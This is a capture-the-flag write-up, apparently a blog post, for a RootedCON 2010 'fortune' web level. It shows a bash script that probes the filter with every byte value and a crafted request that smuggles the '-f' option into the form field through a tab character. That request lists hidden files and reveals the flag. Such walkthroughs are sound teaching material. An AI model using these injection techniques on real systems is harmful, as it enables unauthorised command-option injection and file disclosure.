Level 3 – fortune

Level 3 – fortune

Take a look into the source code:

fortune form source code

A simple GET form with an interesting comment:

<!-- fortune files are in fortunes/ directory -->

This is a clue!

As I didn’t know anything about fortune, I searched the WWW and I found this:

fortune is a simple program that displays a pseudorandom message from a database of quotations that first appeared in Version 7 Unix.

Well, now it’s time to read fortune’s man page:

fortune(6) - Linux man page
Name

fortune - print a random, hopefully interesting, adage
Synopsis

fortune [-aefilosw] [-n length] [ -m pattern] [[n%] file/dir/all]
Description

When fortune is run with no arguments it prints out a random epigram. Epigrams are divided into several categories.

Files

Note: these are the defaults as defined at compile time.

/usr/share/games/fortune
Directory for inoffensive fortunes.
/usr/share/games/fortune/off
Directory for offensive fortunes.

The user may specify alternate sayings. You can specify a specific file, a directory which contains one or more files, or the special word all which says to use all the standard databases. Any of these may be preceded by a percentage, which is a number n between 0 and 100 inclusive, followed by a %. If it is, there will be a n percent probability that an adage will be picked from that file or directory. If the percentages do not sum to 100, and there are specifications without percentages, the remaining percent will apply to those files and/or directories, in which case the probability of selecting from one of them will be based on their relative sizes.

After reading that, I thought: “This do the trick!”

If you look at the values which are submitted with each option in the SELECT tag:

fortunes/haxors
fortunes/cons

and join that information with the above comment, seems clear that we’re submitting the file names within fortunes directory that fortune program uses to give its says. Aren’t you?

To confirm that, I tried these urls:

http://ctf.rs-labs.com:81/fortune_37df49e6961fb54f981713ee07586246/fortunes/haxors

and I got:

crg - "PeDrop" para los amigos
%
dab - "El melenas"
%
dreyer - El panda mas sexy
%
RoMaNSoFt - Tu pesadilla (el que ha programado este nivel, vamos)
%
Chema Alonso - Nuestro security-"pr0n"-star mas internacional
%
tomac & slay - Los chicos de Yersinia
%
zhodiac - 31337
%
matalaz - El amante de las ddbb
%
Mario Ballano - El reverser peligroso
%
uri - No hay reto que se le resista
%
Ero Carrera - Python + IDA powered
%
tora - Koreanas al poder
%
Ruben Santamarta - "Vendo 0day de IExplorer barato. Compren, compren"
%
Kachakil - "No duermo hasta que pase este nivel"
%

then:

http://ctf.rs-labs.com:81/fortune_37df49e6961fb54f981713ee07586246/fortunes/cons

getting:

RootedCON - La primera edicion promete...
%
NoConName - Todo un clasico
%
LaCon - El mejor pescaito
%
Undercon - Otro clasico
%

Now, how can I find more files into fortunes directory?
fortune’s man page has the answer:

Options
-f Print out the list of files which would be searched, but don’t print a fortune.

Trying:

http://ctf.rs-labs.com:81/fortune_37df49e6961fb54f981713ee07586246/?fortune=-f%20fortunes%2F&Submit=Submit

We get:

Hacking attempt! (non-allowed chars)

Oops! A damn char filter!
Take it easy, we know how to test for non-filtered chars.
This script do the job:

#!/bin/bash
#
#
hex() {
  BASE=16
  if [ -z "$1" ]
  then
    HD=0
    return
  fi

  HD=`echo ""$1" "$BASE" o p" | dc`
  return
}

N_CHAR=0
S=0
while [ $S -lt 256 ]
do
  hex $N_CHAR
  HHD=$HD
  HD=`printf "\x$HD"`
  CONTENTS=`wget -O - "http://ctf.rs-labs.com:81/fortune_37df49e6961fb54f981713ee07586246/?fortune=-f${HD}fortunes/" 2>/dev/null`
  CHECK=`echo ${CONTENTS} | egrep -o 'Hacking|invalid'`
  if [ $? -eq 1 ];
  then
    echo "Possible Solution: ${N_CHAR} / ${HHD} :"
    echo ${CONTENTS}
  fi
  S=$(( $S + 1 ))
  N_CHAR=$(( $N_CHAR +1 ))
done

The script output:

Possible Solution: 9 / 9 :
<head>
<title>Fortune</title>
<link rel="stylesheet" type="text/css" href="http://www.rs-labs.com/rooted2010-ctf/green-hax0r-challenge.css" />
</head>
<body>
<center><h1>Fortune</h1> <h2>"La h4x0r-agenda"</h2></center>
<hr> A ver qu&eacute; te parece esta sugerencia... <br>
<pre>100.00% /var/ctfwww/fortune/fortune_37df49e6961fb54f981713ee07586246/fortunes/ 0.00% key-8b2f0453df4597c4e3cd92215bd2000e 0.00% haxors 100.00% nulos 0.00% cons </pre>
<a href="?">Volver</a> <hr>
</body>
Possible Solution: 35 / 23 :
<head>
<title>Fortune</title>
<link rel="stylesheet" type="text/css" href="http://www.rs-labs.com/rooted2010-ctf/green-hax0r-challenge.css" />
</head>
<body>
<center><h1>Fortune</h1> <h2>"La h4x0r-agenda"</h2></center>
<hr> A ver qu&eacute; te parece esta sugerencia... <br>
<pre>100.00% /usr/share/games/fortunes 31.87% literature 15.69% riddles 52.43% fortunes </pre>
<a href="?">Volver</a> <hr>
</body>
Possible Solution: 38 / 26 :
<head>
<title>Fortune</title>
<link rel="stylesheet" type="text/css" href="http://www.rs-labs.com/rooted2010-ctf/green-hax0r-challenge.css" />
</head>
<body>
<center><h1>Fortune</h1> <h2>"La h4x0r-agenda"</h2></center>
<hr> A ver qu&eacute; te parece esta sugerencia... <br>
<pre>100.00% /usr/share/games/fortunes 31.87% literature 15.69% riddles 52.43% fortunes </pre>
<a href="?">Volver</a> <hr>
</body>
Possible Solution: 109 / 6D :
<head>
<title>Fortune</title>
<link rel="stylesheet" type="text/css" href="http://www.rs-labs.com/rooted2010-ctf/green-hax0r-challenge.css" />
</head>
<body>
<center><h1>Fortune</h1> <h2>"La h4x0r-agenda"</h2></center>
<hr> A ver qu&eacute; te parece esta sugerencia... <br>
<pre></pre>
<a href="?">Volver</a> <hr>
</body>
Possible Solution: 110 / 6E :
<head>
<title>Fortune</title>
<link rel="stylesheet" type="text/css" href="http://www.rs-labs.com/rooted2010-ctf/green-hax0r-challenge.css" />
</head>
<body>
<center><h1>Fortune</h1> <h2>"La h4x0r-agenda"</h2></center>
<hr> A ver qu&eacute; te parece esta sugerencia... <br>
<pre>100.00% /usr/share/games/fortunes 31.87% literature 15.69% riddles 52.43% fortunes </pre>
<a href="?">Volver</a> <hr>
</body>
Possible Solution: 118 / 76 :
<head>
<title>Fortune</title>
<link rel="stylesheet" type="text/css" href="http://www.rs-labs.com/rooted2010-ctf/green-hax0r-challenge.css" />
</head>
<body>
<center><h1>Fortune</h1> <h2>"La h4x0r-agenda"</h2></center>
<hr> A ver qu&eacute; te parece esta sugerencia... <br>
<pre>fortune-mod version 9708 </pre>
<a href="?">Volver</a> <hr>
</body>

Using the allowed char %09 we get the files list:

http://ctf.rs-labs.com:81/fortune_37df49e6961fb54f981713ee07586246/?fortune=fortunes/%09-f&Submit=Submit
A ver qué te parece esta sugerencia...

100.00% /var/ctfwww/fortune/fortune_37df49e6961fb54f981713ee07586246/fortunes/
     0.00% key-8b2f0453df4597c4e3cd92215bd2000e
     0.00% haxors
    100.00% nulos
     0.00% cons

The key-8b2f0453df4597c4e3cd92215bd2000e file sounds well, don’t you?

Building the right request…

http://ctf.rs-labs.com:81/fortune_37df49e6961fb54f981713ee07586246/?fortune=fortunes%2Fkey-8b2f0453df4597c4e3cd92215bd2000e&Submit=Submit

I got the Flag!

Enhorabuena. La pass es "Y0u_4r3_m0re_lucky_th4n_y0u_th0ught"

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Antes de enviar el formulario: